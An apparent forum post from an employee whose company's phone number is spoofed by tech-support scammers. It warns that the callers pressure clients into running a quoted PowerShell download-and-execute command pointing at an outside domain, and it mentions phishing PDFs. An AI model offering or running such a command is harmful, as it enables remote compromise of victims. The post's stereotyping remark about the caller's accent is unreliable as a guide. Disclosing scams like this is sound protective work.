Alright, so my company managed to get plethora of tech scammers calling our clients from a spoofed number (the number that’s being spoofed actually belongs to us). They start by quizzing the person they call about their internet to establish some kind of clout and then request to have the person run a very specific Powershell script:
**Invoke-Expression [New-Object Net.Webclient].Downloadstring[, http://cloneIT-corp.online/dwn.php']**
I have no idea if this command will even work since there's that apostrophe at the end and the one comma before that web address.
Unsurprisingly the caller had an Indian accent. Also unshockingly, they get angry when you tell then you're "uncomfortable doing it" because they want to get off the phone to call the people they are actually contracted with (us). So far there were two fake names of Maya Johnson and Hannah Spencer that we discovered.
They were also sending emails from [email protected] where they would send emails containing PDFs probably loaded with a payload. Since my company quarantined these, I don't have access through I'm sure that they'd be willing to send them to anyone who emails them.